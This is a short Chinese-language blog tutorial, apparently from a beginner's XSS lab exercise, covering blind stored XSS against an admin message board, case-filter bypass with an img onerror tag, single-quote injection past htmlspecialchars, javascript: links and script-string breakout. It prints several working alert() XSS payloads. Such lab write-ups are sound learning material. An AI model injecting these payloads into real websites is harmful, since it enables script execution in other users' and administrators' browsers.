前言
大家好,我是Leon-pi,可以叫我pipi,新人报道,是个菜鸟,由于个人也是在学习过程中,文章写的也不是面面俱到,尽善尽美,请见谅。
一个留言板,只有后台才能看见前端存在的内容,从前端无法确定是否存在XSS漏洞,假设存在XSS漏洞,直接往里输入 XSS 代码,称为盲打。
不论3721!,直接往里面插入XSS代码,然后等待,可能会有惊喜!!
被动等待.....(当后台管理员登陆时就可能被攻击)
<script>alert("attack!")</script>
提交后,模拟管理员登录后台
存在XSS漏洞,并且也是存储型XSS
<script>alert("attack!")</script>
什么也没发生,应该是过滤掉一些内容
<SCRIPT>alert("attack!")</SCRIPT>
<img src="x" onerror="alert('error!')">
说明只是过滤了大小写,当然XSS绕过姿势不止一种,师傅们自行扩展
调用该函数进行转换的字符如下
函数转换的类型
如果使用该函数对用户的输入进行处理,而保持默认转换类型可能会出现 XSS漏洞
(仅编码双引号)
'"<>111
查看源码从源代码可以看出,单引号未进行过滤,只是过滤了双引号
#' onclick='alert("aaa")
javascript:someScript;
someScript 是一个或多个使用 ; 分隔的 JavaScript 语句
<a href="javascript:alert('JavaScript Link!');">JavaScript Link</a>
javascript:alert("aaa")
这里发现输入的内容被放入到了js中
';alert("attack xss")</script>
结语:
本人菜弟弟一个,大佬勿喷,谢谢